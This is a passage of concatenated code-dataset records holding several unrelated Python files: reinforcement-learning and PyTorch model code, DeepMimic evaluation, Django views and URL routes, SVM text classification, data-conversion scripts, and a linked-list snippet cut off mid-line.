这里的actionInput表示输出的动作,即强化学习模型中的Action,yInput表示标签值,Q_action表示模型输出与actionInput相乘后,在一维求和,损失函数对标签值与输出值的差进行平方\r\n\t\tself.actionInput = tf.placeholder(\"float\", [None, ACTIONS]) # 输出动作\r\n\t\tself.yInput = tf.placeholder(\"float\", [None]) # 标签\r\n\t\tQ_action = tf.reduce_sum(tf.multiply(self.QValue, self.actionInput), reduction_indices=1)\r\n\t\tself.cost = tf.reduce_mean(tf.square(self.yInput - Q_action))\r\n\t\t# train_step表示对损失函数进行Adam优化。\r\n\t\tself.train_step = tf.train.AdamOptimizer(1e-6).minimize(self.cost)\r\n\t\t\r\n\t\t\r\n\t# 训练网络\r\n\tdef trainNetwork(self): # 图片输入 输出层 全连接层 tf训练\r\n \r\n\t\t# 梯度下降\r\n\t\t# 获取最训练数据\r\n\t\tminibatch = random.sample(self.memory, BATCH)\r\n\t\tstate_batch = [d[0] for d in minibatch]\r\n\t\taction_batch = [d[1] for d in minibatch]\r\n\t\treward_batch = [d[2] for d in minibatch]\r\n\t\tnext_state_batch = [d[3] for d in minibatch]\r\n\t\t# 计算标签值\r\n\t\ty_batch = []\r\n\t\tQValue_batch = self.QValueT.eval(feed_dict = {self.stateInputT : next_state_batch})\r\n\t\tfor i in range(0, BATCH):\r\n\t\t\tterminal = minibatch[i][4]\r\n\t\t\t# if terminal, only equals reward\r\n\t\t\tif terminal:\r\n\t\t\t\ty_batch.append(reward_batch[i])\r\n\t\t\telse:\r\n\t\t\t\ty_batch.append(reward_batch[i] + GAMMA * np.max(QValue_batch[i]))\r\n\t\t\t\t\r\n\t\t# perform gradient step\r\n\t\tself.train_step.run(feed_dict = {\r\n\t\t\tself.yInput : y_batch,\r\n\t\t\tself.actionInput : action_batch,\r\n\t\t\tself.stateInput : state_batch\r\n\t\t\t})\r\n\t\t\r\n\t\t# save progress every 10000 iterations\r\n\t\tif self.timeStep % 10000 == 0:\r\n\t\t\tself.saver.save(self.sess, 'saved_networks/' + GAME + '-dqn', global_step = self.timeStep)\r\n\t\t#更新目标Q网络\r\n\t\tif self.timeStep % UPDATE_TIME == 0:\r\n\t\t\tself.copyTargetQNetwork()\r\n\r\n\t\t#新的观察状态进入经验池\r\n\tdef setPerception(self,nextObservation,action,reward,terminal):\r\n\t\tnewState = np.append(self.currentState[:,:,1:], nextObservation, axis = 2)\r\n\t\tself.memory.append((self.currentState, action, reward, newState, terminal))\r\n\t\t#防止经验池内存占用过大\r\n\t\tif len(self.memory) > REPLAY_MEMORY:\r\n\t\t\tself.memory.popleft()\r\n\t\t# 开始训练网络\r\n\t\tif self.timeStep > OBSERVE:\r\n\t\t\tself.trainNetwork()\r\n\t\t\r\n\t\t# print info\r\n\t\tstate = \"\"\r\n\t\tif self.timeStep <= OBSERVE:\r\n\t\t\tstate = \"observe\"\r\n\t\telif self.timeStep > OBSERVE and self.timeStep <= OBSERVE + EXPLORE:\r\n\t\t\tstate = \"explore\"\r\n\t\telse:\r\n\t\t\tstate = \"train\"\r\n\r\n\t\tprint (\"TIMESTEP\", self.timeStep, \"/ STATE\", state, \\\r\n\t\t\t\"/ EPSILON\", self.epsilon)\r\n\r\n\r\n\t\tself.currentState = newState\r\n\t\tself.timeStep = self.timeStep + 1\r\n\t\r\n\tdef getAction(self):\r\n\t\t# 根据ε 概率选择一个Action\r\n\t\tQValue = self.QValue.eval(feed_dict={self.stateInput : [self.currentState]})[0]\r\n\t\taction = np.zeros([ACTIONS])\r\n\t\taction_index = 0\r\n\t\tif self.timeStep % FRAME_PER_ACTION == 0:\r\n\t\t\tif random.random() <= self.epsilon:\r\n\t\t\t\tprint(\"----------Random Action----------\")\r\n\t\t\t\taction_index = random.randrange(ACTIONS)\r\n\t\t\t\taction[action_index] = 1\r\n\t\t\telse:\r\n\t\t\t\tprint(\"----------QNetwork Action----------\")\r\n\t\t\t\taction_index = np.argmax(QValue)\r\n\t\t\t\taction[action_index] = 1\r\n\t\telse:\r\n\t\t\taction[0] = 1 # do nothing\r\n\t\t\r\n\t\t# 缩减ε\r\n\t\tif self.epsilon > FINAL_EPSILON and self.timeStep > OBSERVE:\r\n\t\t\tself.epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\r\n\r\n\t\treturn action\r\n\t\t\r\ndef preprocess(observation):\r\n\tobservation = cv2.cvtColor(cv2.resize(observation, (80, 80)), cv2.COLOR_BGR2GRAY)\r\n\tret, observation = cv2.threshold(observation,1,255,cv2.THRESH_BINARY)\r\n\treturn np.reshape(observation,(80,80,1))\r\n\t\t\r\n\t\t\r\ndef playGame():\r\n\t#初始化DQN-Nature\r\n\tbrain = DQN_NATURE()\r\n\t# 打开游戏已经仿真通信器\r\n\tflappyBird = game.GameState()\r\n\t# 开始游戏\r\n\t# 获得出事状态\r\n\taction0 = np.array([1,0]) # do nothing\r\n\tobservation0, reward0, terminal = flappyBird.frame_step(action0)\r\n\t# 首先将图像转换为80*80,然后进行灰度化\r\n\tobservation0 = cv2.cvtColor(cv2.resize(observation0, (80, 80)), cv2.COLOR_BGR2GRAY)\r\n\t# 对灰度图像二值化\r\n\tret, observation0 = cv2.threshold(observation0,1,255,cv2.THRESH_BINARY)\r\n\tbrain.setInitState(observation0)\r\n\r\n\t# 开始游戏\r\n\twhile 1!= 0:\r\n\t\taction = brain.getAction()\r\n\t\tnextObservation,reward,terminal = flappyBird.frame_step(action)\r\n\t\tnextObservation = preprocess(nextObservation)\r\n\t\tbrain.setPerception(nextObservation,action,reward,terminal)\r\n\t\r\n\r\ndef main():\r\n playGame()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\t\r\n\t\r\n\t\r\n","sub_path":"DQN-NATURE.py","file_name":"DQN-NATURE.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"398291110","text":"from sqlalchemy import Column, Integer, ForeignKey #add all primary types that are going to be used\nfrom database import db\nimport datetime\n\nclass Task(db.Model):\n __tablename__ = 'tasks'\n id_task = db.Column(Integer, primary_key=True)\n task_name = db.Column(String(150), nullable=False)\n id_task_status = db.Column(Integer, ForeignKey('task_statuses.id_task_status'))\n description = db.relationship('TaskStatus', backref=db.backref('task status per task'))\n #add needed fields\n\n def __init__(self, task_name=None, id_task_status=1):\n self.task_name = task_name\n self.id_task_status = id_task_status\n\nclass TaskStatus(db.Model):\n __tablename__ = 'task_statuses'\n id_task_status = db.Column(Integer, primary_key=True)\n description = db.Column(String(70))\n\n def __init__(self, id_task_status=None, description=None):\n self.id_task_status = id_task_status\n self.description = description\n","sub_path":"initial_script/models/task_model.py","file_name":"task_model.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79355453","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom i2a.utils import get_linear_dims_after_conv\n\n\n# see B.1: model free path uses identical network as the standard model-free baseline agent (without the fc layers)\nclass LatentSpaceModelFreeNetwork(nn.Module):\n def __init__(self, obs_shape, num_outputs=512):\n super(LatentSpaceModelFreeNetwork, self).__init__()\n self._output_size = num_outputs\n\n input_channels = obs_shape[0]\n input_dims = obs_shape[1:]\n\n self.conv1 = nn.Conv2d(input_channels, 16, kernel_size=3, stride=1, padding=0)\n self.conv2 = nn.Conv2d(16, 16, kernel_size=3, stride=2, padding=0)\n self.conv3 = nn.Conv2d(16, 16, kernel_size=3, stride=2, padding=0)\n self.conv4 = nn.Conv2d(16, 16, kernel_size=3, stride=2, padding=0)\n\n linear_input_size = get_linear_dims_after_conv([self.conv1, self.conv2, self.conv3, self.conv4], input_dims)\n self.fc = nn.Linear(linear_input_size, num_outputs)\n\n def forward(self, x):\n x = F.leaky_relu(self.conv1(x))\n x = F.leaky_relu(self.conv2(x))\n x = F.leaky_relu(self.conv3(x))\n x = F.leaky_relu(self.conv4(x))\n\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\n def output_size(self):\n return self._output_size","sub_path":"i2a/latent_space/models/latent_space_model_free_network.py","file_name":"latent_space_model_free_network.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125261038","text":"import time\nimport os\nimport inspect\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(os.path.dirname(currentdir))\nos.sys.path.insert(0, parentdir)\nprint(\"parentdir=\", parentdir)\nimport json\nfrom pybullet_envs.deep_mimic.learning.rl_world import RLWorld\nfrom pybullet_envs.deep_mimic.learning.ppo_agent import PPOAgent\n\nimport pybullet_data\nfrom pybullet_utils.arg_parser import ArgParser\nfrom pybullet_utils.logger import Logger\nfrom pybullet_envs.deep_mimic.env.pybullet_deep_mimic_env import PyBulletDeepMimicEnv\nimport sys\nimport random\nimport numpy as np\nimport parmap\nupdate_timestep = 1. / 240.\nanimating = True\nstep = False\ntotal_reward = 0\nsteps = 0\nrewards = []\neps = 0\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef update_world(world, time_elapsed):\n timeStep = update_timestep\n world.update(timeStep)\n reward = world.env.calc_reward(agent_id=0)\n global total_reward\n total_reward += reward\n global steps\n global eps\n steps += 1\n\n # print(\"reward=\",reward)\n # print(\"steps=\",steps)\n end_episode = world.env.is_episode_end()\n if (end_episode or steps >= 1000):\n # print(\"total_reward=\",total_reward)\n rewards.append(total_reward)\n print(\"total_reward=\", total_reward)\n total_reward = 0\n eps += 1\n steps = 0\n world.end_episode()\n world.reset()\n return\n\n\ndef build_arg_parser(args):\n arg_parser = ArgParser()\n arg_parser.load_args(args)\n\n arg_file = arg_parser.parse_string('arg_file', '')\n if arg_file == '':\n arg_file = \"run_humanoid3d_walk_args.txt\"\n if (arg_file != ''):\n path = pybullet_data.getDataPath() + \"/args/\" + arg_file\n succ = arg_parser.load_file(path)\n Logger.print2(arg_file)\n assert succ, Logger.print2('Failed to load args from: ' + arg_file)\n return arg_parser\n\n\nargs = sys.argv[1:]\n\n\ndef build_world(args, enable_draw, model_path=\"~/deepmimic_output\", i=0):\n arg_parser = build_arg_parser(args)\n print(\"enable_draw=\", enable_draw)\n env = PyBulletDeepMimicEnv(arg_parser, enable_draw)\n world = RLWorld(env, arg_parser)\n # world.env.set_playback_speed(playback_speed)\n\n motion_file = arg_parser.parse_string(\"motion_file\")\n print(\"motion_file=\", motion_file)\n bodies = arg_parser.parse_ints(\"fall_contact_bodies\")\n print(\"bodies=\", bodies)\n int_output_path = arg_parser.parse_string(\"int_output_path\")\n print(\"int_output_path=\", int_output_path)\n agent_files = pybullet_data.getDataPath() + \"/\" + arg_parser.parse_string(\"agent_files\")\n\n AGENT_TYPE_KEY = \"AgentType\"\n\n print(\"agent_file=\", agent_files)\n with open(agent_files) as data_file:\n json_data = json.load(data_file)\n print(\"json_data=\", json_data)\n assert AGENT_TYPE_KEY in json_data\n agent_type = json_data[AGENT_TYPE_KEY]\n print(\"agent_type=\", agent_type)\n agent = PPOAgent(world, id, json_data)\n\n agent.set_enable_training(False)\n\n world.load_agents(path=model_path, i=i)\n world.reset()\n return world\n\n\ndef main(i, path=\"/home/thscowns/deepmimic_output/projected_walk/\"):\n # f = open(\"~/deepmimic_output/\")\n world = build_world(args, False, model_path=path, i=i)\n rewards = []\n total_reward = 0\n eps = 0\n steps = 0\n while (world.env._pybullet_client.isConnected() and eps <10):\n\n timeStep = update_timestep\n # time.sleep(timeStep)\n keys = world.env.getKeyboardEvents()\n animating = True\n if world.env.isKeyTriggered(keys, ' '):\n animating = not animating\n if world.env.isKeyTriggered(keys, 'i'):\n step = True\n if (animating or step):\n world.update(timeStep)\n reward = world.env.calc_reward(agent_id=0)\n steps += 1\n step = False\n end_episode = world.env.is_episode_end()\n total_reward += reward\n if (end_episode or steps >= 1000):\n # print(\"total_reward=\",total_reward)\n rewards.append(total_reward)\n print(\"total_reward=\", total_reward)\n total_reward = 0\n eps += 1\n steps = 0\n world.end_episode()\n world.reset()\n\n\n rewards = np.array(rewards)\n # world.load_agents(path=path, i=i * 100)\n mean = np.mean(rewards)\n std = np.std(rewards)\n print(\"mean=\", mean)\n print(\"std=\", std)\n return mean, std\n\n\ndef multi(list, path):\n return [main(i * 100, path) for i in list]\n\n\ndef square(l, p):\n return [(x, x + p) for x in l]\n\n\ndef plot(x, data, file_path):\n fig, ax = plt.subplots()\n ax.set_xlabel(\"Iteration\")\n ax.set_ylabel(\"Return\")\n for i in data.keys():\n mean = data[i][0]\n std = data[i][1]\n ax.plot(x * 100, mean, label=i)\n\n plt.fill_between(x * 100, mean-std, mean+std, alpha=.1)\n plt.legend()\n plt.savefig(file_path)\n\n\nif __name__ == '__main__':\n num_cores = 16\n data = list(range(0, 140))\n splited_data = np.array_split(data, num_cores)\n splited_data = [x.tolist() for x in splited_data]\n # paths = [3, 7, 10]\n paths = [\"attached_out_walk/\", \"projected_walk/\", \"aligned_walk/\"]\n res = {}\n for p in paths:\n # path = \"/home/thscowns/deepmimic_output/attached_out_walk/\"\n result = parmap.map(multi, splited_data, \"/home/thscowns/deepmimic_output/\" + p, pm_pbar=True, pm_processes=num_cores)\n '''result = parmap.map(square, splited_data, p, pm_pbar=True,\n pm_processes=num_cores)'''\n print(result)\n # results = np.array(result).flatten()\n\n # print(\"results=\", results)\n mean = []\n std = []\n for x in result:\n for y in x:\n mean.append(y[0])\n std.append(y[1])\n print(\"mean=\", mean)\n print(\"std=\", std)\n res[p] = (np.array(mean), np.array(std))\n plot(np.array(data), res, \"deepmimic_output/rewards_log_walk.png\")\n# main(2*100)\n","sub_path":"examples/pybullet/gym/pybullet_envs/deep_mimic/parmap_test.py","file_name":"parmap_test.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52877896","text":"#Epub File Reading and store as a txt file pyhton\r\nfrom epub_conversion.utils import open_book, convert_epub_to_lines\r\nfrom inscriptis import get_text\r\nimport re\r\nimport os\r\n# -*- coding: utf-8 -*-\r\nimport sys\r\nimport nltk\r\nimport pandas as pd\r\nfrom cltk.tokenize.sentence import TokenizeSentence\r\nfrom translate import translator\r\n#nltk.download()\r\nfrom nltk.tokenize import sent_tokenize, word_tokenize\r\nfrom openpyxl.workbook import Workbook\r\nfrom selenium import webdriver\r\nimport time\r\nimport pickle\r\nimport random\r\ndir0='F:/hindi_english_downloaded_split/ont_to_five/english_corpora'\r\nos.chdir(dir0)\r\ntotal_file=0\r\nlist_dir0=os.listdir()\r\nfile_low_list=[]\r\nsent=0\r\n#English=[]\r\n#Hindi=[]\r\n#trans=[]\r\nfor io in range(len(list_dir0)):\r\n dir1=dir0+'/'+str(list_dir0[io])\r\n os.chdir(dir1)\r\n list_dir=os.listdir()\r\n for j in range(len(list_dir)):\r\n English=[]\r\n Hindi=[]\r\n trans=[]\r\n dir2=dir1+'/'+str(list_dir[j])\r\n os.chdir(dir2)\r\n print(dir2)\r\n df_section=pd.read_excel('parallel_corpora.xlsx')\r\n df_sentence=pd.read_excel('parallel_corpora_2.xlsx')\r\n df_doubt=pd.read_excel('Doubtfull_sentences.xlsx')\r\n English.extend(df_section['English'])\r\n Hindi.extend(df_section['Hindi'])\r\n trans.extend(df_section['Translated'])\r\n English.extend(df_sentence['English'])\r\n Hindi.extend(df_sentence['Hindi'])\r\n trans.extend(df_sentence['Translated'])\r\n English.extend(df_doubt['English'])\r\n Hindi.extend(df_doubt['Hindi'])\r\n trans.extend(df_doubt['Translated'])\r\n sent=sent+len(trans)\r\n print(len(trans))\r\n Data_frame_Translation=pd.DataFrame()\r\n Data_frame_Translation['English']=English\r\n Data_frame_Translation['Hindi']=Hindi\r\n Data_frame_Translation['Translated']=trans \r\n Data_frame_Translation.to_excel('Englidh_Hindi_Final_Corpora_v1.xlsx',index=False)\r\n'''os.chdir('F:/hindi_english_downloaded_split/epub')\r\nData_frame_Translation=pd.DataFrame()\r\nData_frame_Translation['English']=English\r\nData_frame_Translation['Hindi']=Hindi\r\nData_frame_Translation['Translated']=trans\r\nData_frame_Translation.to_excel('all.xlsx',index=False)'''\r\n","sub_path":"doubtfull_sentences_parallel_corpora_combine.py","file_name":"doubtfull_sentences_parallel_corpora_combine.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"351250685","text":"#!~/miniconda3/env/tf2/bin/python\nimport json\nimport numpy as np\nimport struct\nimport os\n\n# 参数设置\njson_file = \"./poseAdd2Id.json\"\nbinary_file = \"RawData.bin\"\nnum_frame = 1097\nnum_person = 5\nperson_lib = np.zeros([num_person, 4])\ndata_written = 0\n\n# 判断是否存在文件\nif os.path.isfile(json_file):\n # 开始转数据格式\n with open(json_file, \"r\") as f:\n personDict = json.load(f)\nelse:\n # 没有json文件,加载个锤子啊\n raise Exception(\"No json file. Would you like to load with your hammer?\")\n\n# 写入二进制文件\nwith open(binary_file, \"wb\") as fp:\n for i in range(num_frame):\n personInfo = personDict[str(i)]\n for PersonIndex, PersonData in personInfo.items():\n # 不看pose点,只看框的位置(x1,y1,x2,y2)\n box = PersonData[0:4]\n # 把框的信息更新到数组\n person_lib[ord(PersonIndex) - ord(\"1\"), :] = box\n # 把坐标点四舍五入,然后转换成int\n # buffer = np.round(person_lib).astype(int)\n # 不要用astype函数,因为会把int默认成,这点真的好烦呀,嘤~\n for n in range(num_person):\n for d in range(4):\n # 必须是int变量才允许写入\n data_int = int(round(person_lib[n, d]))\n if data_int < 0:\n data_int = int(0)\n assert type(data_int)==int\n # 坐标范围不超过32767,因此封装成二进制格式只要2字节\n raw_int = struct.pack(\"h\", np.int16(data_int))\n # 写入文件缓冲区\n fp.write(raw_int)\n # 统计写入的数据\n data_written += 1\nprint(\"Finish. %d data written.\" % data_written)\n","sub_path":"convert_data.py","file_name":"convert_data.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261137718","text":"import pandas\nimport numpy\nimport math\nfrom sklearn.svm import SVC\nfrom sklearn import datasets\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.cross_validation import cross_val_score, KFold\nfrom sklearn.grid_search import GridSearchCV\n\nnews_group = datasets.fetch_20newsgroups(subset='all', categories=['alt.atheism', 'sci.space'])\n\nvectorizer = TfidfVectorizer()\nnews_group.data = vectorizer.fit_transform(news_group.data)\n\n# initialize valitador\ncv = KFold(len(news_group.target), shuffle=True, n_folds=5, random_state=241)\n\n# declare parameters\nC_vals = [10**x for x in range(-5, 6)]\nparameters = { 'kernel': ['linear'], 'C': C_vals, 'random_state': [241] }\n\nsvc = SVC(random_state=241)\n\nmodel = GridSearchCV(svc, parameters, cv=cv)\nmodel.fit(news_group.data, news_group.target)\nbest_params = model.best_params_\nC = best_params['C']\n\nmodel = SVC(kernel='linear', C=C, random_state=241)\nmodel.fit(news_group.data, news_group.target)\n\n# gathering answer\nfeature_names = vectorizer.get_feature_names()\nfeatures_weights = model.coef_.toarray().tolist()[0]\nfeatures_weights = [math.fabs(w) for w in features_weights]\nfeature_weights_and_names = list(zip(features_weights, feature_names))\nfeature_weights_and_names.sort(key=lambda f: f[0])\ntop_words = [f[1] for f in feature_weights_and_names[-10:]]\ntop_words.sort()\n\nanswer = ','.join(top_words)\n\nsubmission_file = open('submissions/svm-texts/top_words.txt', 'w+')\nsubmission_file.write(answer)\nsubmission_file.close()\n\nprint(answer)\n","sub_path":"tasks/svm/svm-texts.py","file_name":"svm-texts.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175608397","text":"from __future__ import print_function\nimport sys\nimport os\nimport gzip, json\nimport numpy as np\nfrom collections import Counter\n\nfrom alignment_datastructure import AlignedData\n\n\ndef main():\n #affinity_name = 'Linf'\n nclusters = 15170\n\n for affinity_name in ['L2', 'L1', 'Linf', 'angular']:\n # Create Affinity Matrix\n print(\"Creating {} Affinity Matrix...\".format(affinity_name))\n affinity = np.zeros((nclusters,nclusters), dtype=np.float)\n affinity.fill(np.inf)\n\n error_files = ('errors/{}_{}.error'.format(affinity_name, i) for i in range(0, nclusters))\n\n for cluster_number, f in enumerate(error_files):\n print(\"Loading {0}...\".format(f))\n cluster_number = int(f.split('.')[0][len('errors/{}_'.format(affinity_name)):])\n try:\n errors = np.loadtxt(f, skiprows=1)\n except IOError:\n print(\"FAILED\")\n continue\n if len(errors) != nclusters:\n print(\"FAILED\")\n continue\n affinity[cluster_number, :] = errors\n print(\"Finished loading!!!\")\n np.save('{}_affinity.npy'.format(affinity_name), affinity)\n return None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"clustering/create_affinity.py","file_name":"create_affinity.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291735997","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom apps.module_app.models import Module\nfrom .forms import ModuleForm\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n# Create your views here.\n# 模块页面\n@login_required\ndef module_manage(request):\n # username = request.COOKIES.get('user', '') #读取浏览器 cookie\n module_list = Module.objects.all()\n username = request.session.get('user', '') # 读取浏览器 session\n paginator = Paginator(module_list, 15)\n page = request.GET.get('page')\n try:\n contacts = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n contacts = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n contacts = paginator.page(paginator.num_pages)\n return render(request, 'module_manage.html', {\"user\": username,\n \"modules\": contacts, \"type\": \"list\"})\n\n\n@login_required\ndef add_module(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = ModuleForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n project = form.cleaned_data['project']\n name = form.cleaned_data['name']\n description = form.cleaned_data['description']\n try:\n result = Module.objects.get(name=name)\n if result:\n return render(request, 'module_manage.html',\n {'form': form, \"type\": \"add_module\", 'error': '名称重复'})\n except Module.DoesNotExist:\n Module.objects.create(project=project, name=name, description=description)\n return HttpResponseRedirect('/module/module_manage/')\n # if a GET (or any other method) we'll create a blank form\n else:\n form = ModuleForm()\n\n return render(request, 'module_manage.html', {'form': form, \"type\": \"add_module\"})\n\n\n@login_required\ndef edit_module(request, module_id):\n if request.method == 'POST':\n form = ModuleForm(request.POST)\n if form.is_valid():\n module = Module.objects.get(id=module_id)\n module.project = form.cleaned_data['project']\n module.name = form.cleaned_data['name']\n module.description = form.cleaned_data['description']\n try:\n result = Module.objects.get(name=module.name)\n # 如果结果存在,id不同,则提示名称重复,若是相同id,说明未做更新\n if result.id != module_id:\n return render(request, 'module_manage.html',\n {'form': form, \"type\": \"edit_module\", 'error': '名称重复'})\n else:\n return HttpResponseRedirect('/module/module_manage/')\n except Module.DoesNotExist:\n module.save()\n return HttpResponseRedirect('/module/module_manage/')\n else:\n if module_id:\n form = ModuleForm(\n instance=Module.objects.get(id=module_id))\n return render(request, 'module_manage.html', {'form': form, \"type\": \"edit_module\"})\n\n\n# 删除项目\n@login_required\ndef module_delete(request, module_id):\n Module.objects.filter(id=module_id).delete()\n response = HttpResponseRedirect('/module/module_manage/')\n return response\n\n\n\n\n\n","sub_path":"apps/module_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461182439","text":"from django.conf.urls import url, include\nfrom . import views\n\nbioskopi_patterns = [\n url(r'^$', views.BioskopiView.as_view(), name='bioskopi'),\n url(r'^(?P\\d+)/$', views.bioskop_view, name='bioskop'),\n url(r'^dodaj/$', views.BioskopCreate.as_view(), name='add_bioskop'),\n url(r'^(?P\\d+)/azuriraj/$', views.BioskopUpdate.as_view(), name='update_bioskop'),\n url(r'^(?P\\d+)/obrisi/$', views.BioskopDelete.as_view(), name='delete_bioskop'),\n url(r'^(?P\\d+)/oceni/$', views.oceni_bioskop, name='oceni_bioskop'),\n url(r'^(?P\\d+)/dodaj/$', views.add_film, name='add_film'),\n url(r'^(?P\\d+)/ponude/$', views.ponude_filmovi, name='ponude_filmovi'),\n url(r'^(?P\\d+)/(?P\\d+)/$', views.film_view, name='film_view'),\n url(r'^(?P\\d+)/(?P\\d+)/azuriraj/$', views.update_film, name='update_film'),\n url(r'^(?P\\d+)/(?P\\d+)/obrisi/$', views.delete_film, name='delete_film'),\n url(r'^(?P\\d+)/(?P\\d+)/rezervisi/$', views.rezervisi_film, name='rezervisi_film'),\n url(r'^(?P\\d+)/(?P\\d+)/(?P\\d+)/rezervisi-klikom/$', views.rezervisi_film_klikom, name='rezervisi_film_klikom'),\n url(r'^(?P\\d+)/(?P\\d+)/oceni/$', views.oceni_film, name='oceni_film'),\n]\n\nrezervacije_filmova_patterns = [\n url(r'^$', views.RezervacijeFilmova.as_view(), name='rezervacije_filmova'),\n url(r'^(?P\\d+)/obrisi/$', views.delete_rezervacija_filma, name='delete_rezervacija_filma'),\n url(r'^(?P\\d+)/(?P\\d+)/prihvati-film/$', views.prihvati_poziv_film, name='prihvati_poziv_film'),\n url(r'^(?P\\d+)/(?P\\d+)/odbij-film/$', views.odbij_poziv_film, name='odbij_poziv_film'),\n]\n\npozorista_patterns = [\n url(r'^$', views.PozoristaView.as_view(), name='pozorista'),\n url(r'^(?P\\d+)/$', views.pozoriste_view, name='pozoriste'),\n url(r'^dodaj/$', views.PozoristeCreate.as_view(), name='add_pozoriste'),\n url(r'^(?P\\d+)/azuriraj/$', views.PozoristeUpdate.as_view(), name='update_pozoriste'),\n url(r'^(?P\\d+)/obrisi/$', views.PozoristeDelete.as_view(), name='delete_pozoriste'),\n url(r'^(?P\\d+)/oceni/$', views.oceni_pozoriste, name='oceni_pozoriste'),\n url(r'^(?P\\d+)/dodaj/$', views.add_predstava, name='add_predstava'),\n url(r'^(?P\\d+)/ponude/$', views.ponude_predstave, name='ponude_predstave'),\n url(r'^(?P\\d+)/(?P\\d+)/$', views.predstava_view, name='predstava_view'),\n url(r'^(?P\\d+)/(?P\\d+)/azuriraj/$', views.update_predstava, name='update_predstava'),\n url(r'^(?P\\d+)/(?P\\d+)/obrisi/$', views.delete_predstava, name='delete_predstava'),\n url(r'^(?P\\d+)/(?P\\d+)/rezervisi/$', views.rezervisi_predstavu, name='rezervisi_predstavu'),\n url(r'^(?P\\d+)/(?P\\d+)/(?P\\d+)/rezervisi-klikom/$', views.rezervisi_predstavu_klikom, name='rezervisi_predstavu_klikom'),\n url(r'^(?P\\d+)/(?P\\d+)/oceni/$', views.oceni_predstavu, name='oceni_predstavu'),\n]\n\nrezervacije_predstava_patterns = [\n url(r'^$', views.RezervacijePredstava.as_view(), name='rezervacije_predstava'),\n url(r'(?P\\d+)/obrisi/$', views.delete_rezervacija_predstave, name='delete_rezervacija_predstave'),\n url(r'(?P\\d+)/(?P\\d+)/prihvati-predstavu/$', views.prihvati_poziv_predstava, name='prihvati_poziv_predstava'),\n url(r'(?P\\d+)/(?P\\d+)/odbij-predstavu/$', views.odbij_poziv_predstava, name='odbij_poziv_predstava'),\n]\n\nprofile_patterns = [\n url(r'^$', views.user_profile, name='user_profile'),\n url(r'azuriraj/$', views.edit_profile, name='edit_profile'),\n url(r'promeni_lozinku/$', views.change_password, name='password_change'),\n]\n\nfriend_patterns = [\n url(r'^$', views.friends, name='friends'),\n url(r'dodaj/(?P\\d+)/$', views.add_friend, name='add_friend'),\n url(r'obrisi/(?P\\d+)/$', views.remove_friend, name='remove_friend'),\n]\n\nuser_patterns = [\n url(r'^$', views.users, name='users'),\n]\n\nzahtevi_patterns = [\n url(r'^$', views.zahtevi, name='zahtevi'),\n url(r'(?P\\d+)/prihvati/', views.accept_request, name='accept_request'),\n url(r'zahtevi/(?P\\d+)/odbij/', views.decline_request, name='decline_request'),\n]\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^bioskopi/', include(bioskopi_patterns)),\n url(r'^pozorista/', include(pozorista_patterns)),\n url(r'^rezervacije/filmovi/', include(rezervacije_filmova_patterns)),\n url(r'^rezervacije/predstave/', include(rezervacije_predstava_patterns)),\n url(r'^profil/', include(profile_patterns)),\n url(r'^prijatelji/', include(friend_patterns)),\n url(r'^korisnici/', include(user_patterns)),\n url(r'^zahtevi/', include(zahtevi_patterns)),\n\n url(r'registracija/$', views.registration_view, name='registration'),\n url(r'^registracija/(?P[0-9A-Za-z_\\-]+)/(?P[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$', views.activate, name='activate'),\n url(r'prijava/$', views.login_view, name='login'),\n url(r'odjava/$', views.logout_view, name='logout'),\n url(r'pretrazi/$', views.search_users, name='search_users'),\n]\n","sub_path":"projekat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"56032330","text":"class Node: # 노드 클래스 안에는 데이터 필드와 링크 필드가 있다.\n\n def __init__(self, data):\n self.data = data # 데이터 필드\n self.next = None # 링크 필드\n \n def __repr__(self):\n return str(self.data)\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None # 연결 리스트의 초기 헤드는 None이다. (head)\n self.count = 0\n\nllist = LinkedList()\nfirst = Node(1)\nllist.head = first \nsecond = 